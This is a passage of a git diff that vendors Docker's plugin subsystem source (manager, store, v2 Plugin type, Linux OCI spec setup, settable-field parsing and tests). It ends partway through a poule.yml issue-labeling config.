{ + logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err) + } + } + } +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + if !p.IsEnabled() { + return fmt.Errorf("plugin %s is already disabled", p.Name()) + } + + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + pm.config.Store.SetState(p, false) + return pm.save(p) +} + +// Shutdown stops all plugins and called during daemon shutdown. +func (pm *Manager) Shutdown() { + plugins := pm.config.Store.GetAll() + for _, p := range plugins { + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if pm.config.LiveRestoreEnabled && p.IsEnabled() { + logrus.Debug("Plugin active when liveRestore is set, skipping shutdown") + continue + } + if pm.containerdClient != nil && p.IsEnabled() { + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + } + } +} + +func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) { + config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) + if err != nil { + return err + } + + pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) + orig := filepath.Join(pdir, "rootfs") + backup := orig + "-old" + if err := os.Rename(orig, backup); err != nil { + return err + } + + defer func() { + if err != nil { + if rmErr := os.RemoveAll(orig); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade") + return + } + + if err := os.Rename(backup, orig); err != nil { + err = errors.Wrap(err, "error restoring old plugin root on upgrade failure") + } + if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir) + } + } else { + if rmErr := os.RemoveAll(backup); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up old plugin root after successful upgrade") + } + + p.Config = configDigest + p.Blobsums = blobsums + } + }() + + if err := os.Rename(tmpRootFSDir, orig); err != nil { + return errors.Wrap(err, "error upgrading") + } + + p.PluginObj.Config = config + err = pm.save(p) + return errors.Wrap(err, "error saving upgraded plugin config") +} + +func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest.Digest, privileges *types.PluginPrivileges) (types.PluginConfig, error) { + configRC, err := pm.blobStore.Get(configDigest) + if err != nil { + return types.PluginConfig{}, err + } + defer configRC.Close() + + var config types.PluginConfig + dec := json.NewDecoder(configRC) + if err := dec.Decode(&config); err != nil { + return types.PluginConfig{}, errors.Wrapf(err, "failed to parse config") + } + if dec.More() { + return types.PluginConfig{}, errors.New("invalid config json") + } + + requiredPrivileges, err := computePrivileges(config) + if err != nil { + return types.PluginConfig{}, err + } + if privileges != nil { + if err := validatePrivileges(requiredPrivileges, *privileges); err != nil { + return types.PluginConfig{}, err + } + } + + return config, nil +} + +// createPlugin creates a new plugin. take lock before calling. +func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) { + if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. remove store + return nil, err + } + + config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) + if err != nil { + return nil, err + } + + p = &v2.Plugin{ + PluginObj: types.Plugin{ + Name: name, + ID: stringid.GenerateRandomID(), + Config: config, + }, + Config: configDigest, + Blobsums: blobsums, + } + p.InitEmptySettings() + + pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) + if err := os.MkdirAll(pdir, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", pdir) + } + + defer func() { + if err != nil { + os.RemoveAll(pdir) + } + }() + + if err := os.Rename(rootFSDir, filepath.Join(pdir, rootFSFileName)); err != nil { + return nil, errors.Wrap(err, "failed to rename rootfs") + } + + if err := pm.save(p); err != nil { + return nil, err + } + + pm.config.Store.Add(p) // todo: remove + + return p, nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go new file mode 100644 index 0000000000..72ccae72d3 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_solaris.go @@ -0,0 +1,28 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { + return nil, fmt.Errorf("Not implemented") +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) restore(p *v2.Plugin) error { + return fmt.Errorf("Not implemented") +} + +// Shutdown plugins +func (pm *Manager) Shutdown() { +} diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go new file mode 100644 index 0000000000..4469a671f7 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_windows.go @@ -0,0 +1,30 @@ +// +build windows + +package plugin + +import ( + "fmt" + + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { + return nil, fmt.Errorf("Not implemented") +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) restore(p *v2.Plugin) error { + return fmt.Errorf("Not implemented") +} + +// Shutdown plugins +func (pm *Manager) Shutdown() { +} diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go new file mode 100644 index 0000000000..b7a96a950a --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/store.go @@ -0,0 +1,263 @@ +package plugin + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/pkg/errors" +) + +/* allowV1PluginsFallback determines daemon's support for V1 plugins. + * When the time comes to remove support for V1 plugins, flipping + * this bool is all that will be needed. + */ +const allowV1PluginsFallback bool = true + +/* defaultAPIVersion is the version of the plugin API for volume, network, + IPAM and authz. This is a very stable API. When we update this API, then + pluginType should include a version. eg "networkdriver/2.0". +*/ +const defaultAPIVersion string = "1.0" + +// ErrNotFound indicates that a plugin was not found locally. +type ErrNotFound string + +func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) } + +// ErrAmbiguous indicates that a plugin was not found locally. +type ErrAmbiguous string + +func (name ErrAmbiguous) Error() string { + return fmt.Sprintf("multiple plugins found for %q", string(name)) +} + +// GetV2Plugin retreives a plugin by name, id or partial ID. +func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { + ps.RLock() + defer ps.RUnlock() + + id, err := ps.resolvePluginID(refOrID) + if err != nil { + return nil, err + } + + p, idOk := ps.plugins[id] + if !idOk { + return nil, errors.WithStack(ErrNotFound(id)) + } + + return p, nil +} + +// validateName returns error if name is already reserved. always call with lock and full name +func (ps *Store) validateName(name string) error { + for _, p := range ps.plugins { + if p.Name() == name { + return errors.Errorf("plugin %q already exists", name) + } + } + return nil +} + +// GetAll retreives all plugins. +func (ps *Store) GetAll() map[string]*v2.Plugin { + ps.RLock() + defer ps.RUnlock() + return ps.plugins +} + +// SetAll initialized plugins during daemon restore. +func (ps *Store) SetAll(plugins map[string]*v2.Plugin) { + ps.Lock() + defer ps.Unlock() + ps.plugins = plugins +} + +func (ps *Store) getAllByCap(capability string) []plugingetter.CompatPlugin { + ps.RLock() + defer ps.RUnlock() + + result := make([]plugingetter.CompatPlugin, 0, 1) + for _, p := range ps.plugins { + if p.IsEnabled() { + if _, err := p.FilterByCap(capability); err == nil { + result = append(result, p) + } + } + } + return result +} + +// SetState sets the active state of the plugin and updates plugindb. +func (ps *Store) SetState(p *v2.Plugin, state bool) { + ps.Lock() + defer ps.Unlock() + + p.PluginObj.Enabled = state +} + +// Add adds a plugin to memory and plugindb. +// An error will be returned if there is a collision. +func (ps *Store) Add(p *v2.Plugin) error { + ps.Lock() + defer ps.Unlock() + + if v, exist := ps.plugins[p.GetID()]; exist { + return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name()) + } + ps.plugins[p.GetID()] = p + return nil +} + +// Remove removes a plugin from memory and plugindb. +func (ps *Store) Remove(p *v2.Plugin) { + ps.Lock() + delete(ps.plugins, p.GetID()) + ps.Unlock() +} + +// Get returns an enabled plugin matching the given name and capability. +func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) { + var ( + p *v2.Plugin + err error + ) + + // Lookup using new model. + if ps != nil { + p, err = ps.GetV2Plugin(name) + if err == nil { + p.AddRefCount(mode) + if p.IsEnabled() { + return p.FilterByCap(capability) + } + // Plugin was found but it is disabled, so we should not fall back to legacy plugins + // but we should error out right away + return nil, ErrNotFound(name) + } + if _, ok := errors.Cause(err).(ErrNotFound); !ok { + return nil, err + } + } + + // Lookup using legacy model. + if allowV1PluginsFallback { + p, err := plugins.Get(name, capability) + if err != nil { + return nil, fmt.Errorf("legacy plugin: %v", err) + } + return p, nil + } + + return nil, err +} + +// GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability. +func (ps *Store) GetAllManagedPluginsByCap(capability string) []plugingetter.CompatPlugin { + return ps.getAllByCap(capability) +} + +// GetAllByCap returns a list of enabled plugins matching the given capability. +func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) { + result := make([]plugingetter.CompatPlugin, 0, 1) + + /* Daemon start always calls plugin.Init thereby initializing a store. + * So store on experimental builds can never be nil, even while + * handling legacy plugins. However, there are legacy plugin unit + * tests where the volume subsystem directly talks with the plugin, + * bypassing the daemon. For such tests, this check is necessary. + */ + if ps != nil { + ps.RLock() + result = ps.getAllByCap(capability) + ps.RUnlock() + } + + // Lookup with legacy model + if allowV1PluginsFallback { + pl, err := plugins.GetAll(capability) + if err != nil { + return nil, fmt.Errorf("legacy plugin: %v", err) + } + for _, p := range pl { + result = append(result, p) + } + } + return result, nil +} + +// Handle sets a callback for a given capability. It is only used by network +// and ipam drivers during plugin registration. The callback registers the +// driver with the subsystem (network, ipam). +func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) { + pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion) + + // Register callback with new plugin model. + ps.Lock() + handlers, ok := ps.handlers[pluginType] + if !ok { + handlers = []func(string, *plugins.Client){} + } + handlers = append(handlers, callback) + ps.handlers[pluginType] = handlers + ps.Unlock() + + // Register callback with legacy plugin model. + if allowV1PluginsFallback { + plugins.Handle(capability, callback) + } +} + +// CallHandler calls the registered callback. It is invoked during plugin enable. +func (ps *Store) CallHandler(p *v2.Plugin) { + for _, typ := range p.GetTypes() { + for _, handler := range ps.handlers[typ.String()] { + handler(p.Name(), p.Client()) + } + } +} + +func (ps *Store) resolvePluginID(idOrName string) (string, error) { + ps.RLock() // todo: fix + defer ps.RUnlock() + + if validFullID.MatchString(idOrName) { + return idOrName, nil + } + + ref, err := reference.ParseNamed(idOrName) + if err != nil { + return "", errors.WithStack(ErrNotFound(idOrName)) + } + if _, ok := ref.(reference.Canonical); ok { + logrus.Warnf("canonical references cannot be resolved: %v", ref.String()) + return "", errors.WithStack(ErrNotFound(idOrName)) + } + + fullRef := reference.WithDefaultTag(ref) + + for _, p := range ps.plugins { + if p.PluginObj.Name == fullRef.String() { + return p.PluginObj.ID, nil + } + } + + var found *v2.Plugin + for id, p := range ps.plugins { // this can be optimized + if strings.HasPrefix(id, idOrName) { + if found != nil { + return "", errors.WithStack(ErrAmbiguous(idOrName)) + } + found = p + } + } + if found == nil { + return "", errors.WithStack(ErrNotFound(idOrName)) + } + return found.PluginObj.ID, nil +} diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go new file mode 100644 index 0000000000..6b1f6a9418 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/store_test.go @@ -0,0 +1,33 @@ +package plugin + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/plugin/v2" +) + +func TestFilterByCapNeg(t *testing.T) { + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} + i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + _, err := p.FilterByCap("foobar") + if err == nil { + t.Fatalf("expected inadequate error, got %v", err) + } +} + +func TestFilterByCapPos(t *testing.T) { + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + + iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} + i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + _, err := p.FilterByCap("volumedriver") + if err != nil { + t.Fatalf("expected no error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go new file mode 100644 index 0000000000..93b489a14b --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go @@ -0,0 +1,244 @@ +package v2 + +import ( + "fmt" + "strings" + "sync" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" +) + +// Plugin represents an individual plugin. +type Plugin struct { + mu sync.RWMutex + PluginObj types.Plugin `json:"plugin"` // todo: embed struct + pClient *plugins.Client + refCount int + PropagatedMount string // TODO: make private + Rootfs string // TODO: make private + + Config digest.Digest + Blobsums []digest.Digest +} + +const defaultPluginRuntimeDestination = "/run/docker/plugins" + +// ErrInadequateCapability indicates that the plugin did not have the requested capability. +type ErrInadequateCapability struct { + cap string +} + +func (e ErrInadequateCapability) Error() string { + return fmt.Sprintf("plugin does not provide %q capability", e.cap) +} + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For Plugin objects this returns the host path of the plugin container's rootfs. +func (p *Plugin) BasePath() string { + return p.Rootfs +} + +// Client returns the plugin client. +func (p *Plugin) Client() *plugins.Client { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.pClient +} + +// SetPClient set the plugin client. +func (p *Plugin) SetPClient(client *plugins.Client) { + p.mu.Lock() + defer p.mu.Unlock() + + p.pClient = client +} + +// IsV1 returns true for V1 plugins and false otherwise. +func (p *Plugin) IsV1() bool { + return false +} + +// Name returns the plugin name. +func (p *Plugin) Name() string { + return p.PluginObj.Name +} + +// FilterByCap query the plugin for a given capability. +func (p *Plugin) FilterByCap(capability string) (*Plugin, error) { + capability = strings.ToLower(capability) + for _, typ := range p.PluginObj.Config.Interface.Types { + if typ.Capability == capability && typ.Prefix == "docker" { + return p, nil + } + } + return nil, ErrInadequateCapability{capability} +} + +// InitEmptySettings initializes empty settings for a plugin. +func (p *Plugin) InitEmptySettings() { + p.PluginObj.Settings.Mounts = make([]types.PluginMount, len(p.PluginObj.Config.Mounts)) + copy(p.PluginObj.Settings.Mounts, p.PluginObj.Config.Mounts) + p.PluginObj.Settings.Devices = make([]types.PluginDevice, len(p.PluginObj.Config.Linux.Devices)) + copy(p.PluginObj.Settings.Devices, p.PluginObj.Config.Linux.Devices) + p.PluginObj.Settings.Env = make([]string, 0, len(p.PluginObj.Config.Env)) + for _, env := range p.PluginObj.Config.Env { + if env.Value != nil { + p.PluginObj.Settings.Env = append(p.PluginObj.Settings.Env, fmt.Sprintf("%s=%s", env.Name, *env.Value)) + } + } + p.PluginObj.Settings.Args = make([]string, len(p.PluginObj.Config.Args.Value)) + copy(p.PluginObj.Settings.Args, p.PluginObj.Config.Args.Value) +} + +// Set is used to pass arguments to the plugin. +func (p *Plugin) Set(args []string) error { + p.mu.Lock() + defer p.mu.Unlock() + + if p.PluginObj.Enabled { + return fmt.Errorf("cannot set on an active plugin, disable plugin before setting") + } + + sets, err := newSettables(args) + if err != nil { + return err + } + + // TODO(vieux): lots of code duplication here, needs to be refactored. + +next: + for _, s := range sets { + // range over all the envs in the config + for _, env := range p.PluginObj.Config.Env { + // found the env in the config + if env.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsEnv, env.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + // is it, so lets update the settings in memory + updateSettingsEnv(&p.PluginObj.Settings.Env, &s) + continue next + } + } + + // range over all the mounts in the config + for _, mount := range p.PluginObj.Config.Mounts { + // found the mount in the config + if mount.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsMounts, mount.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + *mount.Source = s.value + continue next + } + } + + // range over all the devices in the config + for _, device := range p.PluginObj.Config.Linux.Devices { + // found the device in the config + if device.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsDevices, device.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + *device.Path = s.value + continue next + } + } + + // found the name in the config + if p.PluginObj.Config.Args.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsArgs, p.PluginObj.Config.Args.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + p.PluginObj.Settings.Args = strings.Split(s.value, " ") + continue next + } + + return fmt.Errorf("setting %q not found in the plugin configuration", s.name) + } + + return nil +} + +// IsEnabled returns the active state of the plugin. +func (p *Plugin) IsEnabled() bool { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Enabled +} + +// GetID returns the plugin's ID. +func (p *Plugin) GetID() string { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.ID +} + +// GetSocket returns the plugin socket. +func (p *Plugin) GetSocket() string { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Config.Interface.Socket +} + +// GetTypes returns the interface types of a plugin. +func (p *Plugin) GetTypes() []types.PluginInterfaceType { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Config.Interface.Types +} + +// GetRefCount returns the reference count. +func (p *Plugin) GetRefCount() int { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.refCount +} + +// AddRefCount adds to reference count. +func (p *Plugin) AddRefCount(count int) { + p.mu.Lock() + defer p.mu.Unlock() + + p.refCount += count +} + +// Acquire increments the plugin's reference count +// This should be followed up by `Release()` when the plugin is no longer in use. +func (p *Plugin) Acquire() { + p.AddRefCount(plugingetter.ACQUIRE) +} + +// Release decrements the plugin's reference count +// This should only be called when the plugin is no longer in use, e.g. with +// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE) +func (p *Plugin) Release() { + p.AddRefCount(plugingetter.RELEASE) +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go new file mode 100644 index 0000000000..e980e7f29a --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go @@ -0,0 +1,121 @@ +// +build linux + +package v2 + +import ( + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +// InitSpec creates an OCI spec from the plugin's config. +func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { + s := oci.DefaultSpec() + s.Root = specs.Root{ + Path: p.Rootfs, + Readonly: false, // TODO: all plugins should be readonly? settable in config? + } + + userMounts := make(map[string]struct{}, len(p.PluginObj.Settings.Mounts)) + for _, m := range p.PluginObj.Settings.Mounts { + userMounts[m.Destination] = struct{}{} + } + + execRoot = filepath.Join(execRoot, p.PluginObj.ID) + if err := os.MkdirAll(execRoot, 0700); err != nil { + return nil, errors.WithStack(err) + } + + mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{ + Source: &execRoot, + Destination: defaultPluginRuntimeDestination, + Type: "bind", + Options: []string{"rbind", "rshared"}, + }) + + if p.PluginObj.Config.Network.Type != "" { + // TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize) + if p.PluginObj.Config.Network.Type == "host" { + oci.RemoveNamespace(&s, specs.NamespaceType("network")) + } + etcHosts := "/etc/hosts" + resolvConf := "/etc/resolv.conf" + mounts = append(mounts, + types.PluginMount{ + Source: &etcHosts, + Destination: etcHosts, + Type: "bind", + Options: []string{"rbind", "ro"}, + }, + types.PluginMount{ + Source: &resolvConf, + Destination: resolvConf, + Type: "bind", + Options: []string{"rbind", "ro"}, + }) + } + + for _, mnt := range mounts { + m := specs.Mount{ + Destination: mnt.Destination, + Type: mnt.Type, + Options: mnt.Options, + } + if mnt.Source == nil { + return nil, errors.New("mount source is not specified") + } + m.Source = *mnt.Source + s.Mounts = append(s.Mounts, m) + } + + for i, m := range s.Mounts { + if strings.HasPrefix(m.Destination, "/dev/") { + if _, ok := userMounts[m.Destination]; ok { + s.Mounts = append(s.Mounts[:i], s.Mounts[i+1:]...) + } + } + } + + if p.PluginObj.Config.PropagatedMount != "" { + p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + s.Linux.RootfsPropagation = "rshared" + } + + if p.PluginObj.Config.Linux.AllowAllDevices { + rwm := "rwm" + s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}} + } + for _, dev := range p.PluginObj.Settings.Devices { + path := *dev.Path + d, dPermissions, err := oci.DevicesFromPath(path, path, "rwm") + if err != nil { + return nil, errors.WithStack(err) + } + s.Linux.Devices = append(s.Linux.Devices, d...) + s.Linux.Resources.Devices = append(s.Linux.Resources.Devices, dPermissions...) + } + + envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1) + envs[0] = "PATH=" + system.DefaultPathEnv + envs = append(envs, p.PluginObj.Settings.Env...) + + args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...) + cwd := p.PluginObj.Config.WorkDir + if len(cwd) == 0 { + cwd = "/" + } + s.Process.Terminal = false + s.Process.Args = args + s.Process.Cwd = cwd + s.Process.Env = envs + + s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...) + + return &s, nil +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go new file mode 100644 index 0000000000..e60fb8311e --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go @@ -0,0 +1,14 @@ +// +build !linux + +package v2 + +import ( + "errors" + + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// InitSpec creates an OCI spec from the plugin's config. +func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { + return nil, errors.New("not supported") +} diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go new file mode 100644 index 0000000000..79c6befc24 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/settable.go @@ -0,0 +1,102 @@ +package v2 + +import ( + "errors" + "fmt" + "strings" +) + +type settable struct { + name string + field string + value string +} + +var ( + allowedSettableFieldsEnv = []string{"value"} + allowedSettableFieldsArgs = []string{"value"} + allowedSettableFieldsDevices = []string{"path"} + allowedSettableFieldsMounts = []string{"source"} + + errMultipleFields = errors.New("multiple fields are settable, one must be specified") + errInvalidFormat = errors.New("invalid format, must be [.][=]") +) + +func newSettables(args []string) ([]settable, error) { + sets := make([]settable, 0, len(args)) + for _, arg := range args { + set, err := newSettable(arg) + if err != nil { + return nil, err + } + sets = append(sets, set) + } + return sets, nil +} + +func newSettable(arg string) (settable, error) { + var set settable + if i := strings.Index(arg, "="); i == 0 { + return set, errInvalidFormat + } else if i < 0 { + set.name = arg + } else { + set.name = arg[:i] + set.value = arg[i+1:] + } + + if i := strings.LastIndex(set.name, "."); i > 0 { + set.field = set.name[i+1:] + set.name = arg[:i] + } + + return set, nil +} + +// prettyName return name.field if there is a field, otherwise name. +func (set *settable) prettyName() string { + if set.field != "" { + return fmt.Sprintf("%s.%s", set.name, set.field) + } + return set.name +} + +func (set *settable) isSettable(allowedSettableFields []string, settable []string) (bool, error) { + if set.field == "" { + if len(settable) == 1 { + // if field is not specified and there only one settable, default to it. + set.field = settable[0] + } else if len(settable) > 1 { + return false, errMultipleFields + } + } + + isAllowed := false + for _, allowedSettableField := range allowedSettableFields { + if set.field == allowedSettableField { + isAllowed = true + break + } + } + + if isAllowed { + for _, settableField := range settable { + if set.field == settableField { + return true, nil + } + } + } + + return false, nil +} + +func updateSettingsEnv(env *[]string, set *settable) { + for i, e := range *env { + if parts := strings.SplitN(e, "=", 2); parts[0] == set.name { + (*env)[i] = fmt.Sprintf("%s=%s", set.name, set.value) + return + } + } + + *env = append(*env, fmt.Sprintf("%s=%s", set.name, set.value)) +} diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go new file mode 100644 index 0000000000..7183f3a679 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go @@ -0,0 +1,91 @@ +package v2 + +import ( + "reflect" + "testing" +) + +func TestNewSettable(t *testing.T) { + contexts := []struct { + arg string + name string + field string + value string + err error + }{ + {"name=value", "name", "", "value", nil}, + {"name", "name", "", "", nil}, + {"name.field=value", "name", "field", "value", nil}, + {"name.field", "name", "field", "", nil}, + {"=value", "", "", "", errInvalidFormat}, + {"=", "", "", "", errInvalidFormat}, + } + + for _, c := range contexts { + s, err := newSettable(c.arg) + if err != c.err { + t.Fatalf("expected error to be %v, got %v", c.err, err) + } + + if s.name != c.name { + t.Fatalf("expected name to be %q, got %q", c.name, s.name) + } + + if s.field != c.field { + t.Fatalf("expected field to be %q, got %q", c.field, s.field) + } + + if s.value != c.value { + t.Fatalf("expected value to be %q, got %q", c.value, s.value) + } + + } +} + +func TestIsSettable(t *testing.T) { + contexts := []struct { + allowedSettableFields []string + set settable + settable []string + result bool + err error + }{ + {allowedSettableFieldsEnv, settable{}, []string{}, false, nil}, + {allowedSettableFieldsEnv, settable{field: "value"}, []string{}, false, nil}, + {allowedSettableFieldsEnv, settable{}, []string{"value"}, true, nil}, + {allowedSettableFieldsEnv, settable{field: "value"}, []string{"value"}, true, nil}, + {allowedSettableFieldsEnv, settable{field: "foo"}, []string{"value"}, false, nil}, + {allowedSettableFieldsEnv, settable{field: "foo"}, []string{"foo"}, false, nil}, + {allowedSettableFieldsEnv, settable{}, []string{"value1", "value2"}, false, errMultipleFields}, + } + + for _, c := range contexts { + if res, err := c.set.isSettable(c.allowedSettableFields, c.settable); res != c.result { + t.Fatalf("expected result to be %t, got %t", c.result, res) + } else if err != c.err { + t.Fatalf("expected error to be %v, got %v", c.err, err) + } + } +} + +func TestUpdateSettinsEnv(t *testing.T) { + contexts := []struct { + env []string + set settable + newEnv []string + }{ + {[]string{}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}}, + {[]string{"DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}}, + {[]string{"FOO=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}}, + {[]string{"FOO=0", "DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}}, + {[]string{"FOO=0", "DEBUG=0", "BAR=1"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1", "BAR=1"}}, + } + + for _, c := range contexts { + updateSettingsEnv(&c.env, &c.set) + + if !reflect.DeepEqual(c.env, c.newEnv) { + t.Fatalf("expected env to be %q, got %q", c.newEnv, c.env) + } + } +} diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml new file mode 100644 index 0000000000..61aab4551b --- /dev/null +++ b/vendor/github.com/docker/docker/poule.yml @@ -0,0 +1,88 @@ +# Add a "status/0-triage" to every newly opened pull request. +- triggers: + pull_request: [ opened ] + operations: + - type: label + settings: { + patterns: { + status/0-triage: [ ".*" ], + } + } + +# For every newly created or modified issue, assign label based on matching regexp using the `label` +# operation, as well as an Engine-specific version label using `version-label`. +- triggers: + issues: [ edited, opened, reopened ] + operations: + - type: label + settings: { + patterns: { + area/builder: [ "dockerfile", "docker build" ], + area/distribution: [ "docker login", "docker logout", "docker pull", "docker push", "docker search" ], + area/plugins: [ "docker plugin" ], + area/networking: [ "docker network", "ipvs", "vxlan" ], + area/runtime: [ "oci runtime error" ], + area/security/trust: [ "docker_content_trust" ], + area/swarm: [ "docker node", "docker service", "docker swarm" ], + platform/desktop: [ "docker for mac", "docker for windows" ], + platform/freebsd: [ "freebsd" ], + platform/windows: [ "nanoserver", "windowsservercore", "windows server" ], + } + } + - type: version-label + +# When a pull request is closed, attach it to the currently active milestone. +- triggers: + pull_request: [ closed ] + operations: + - type: version-milestone + +# Labeling a PR with `rebuild/` triggers a rebuild job for the associated +# configuration. The label is automatically removed after the rebuild is initiated. There's no such +# thing as "templating" in this configuration, so we need one operation for each type of +# configuration that can be triggered. +- triggers: + pull_request: [ labeled ] + operations: + - 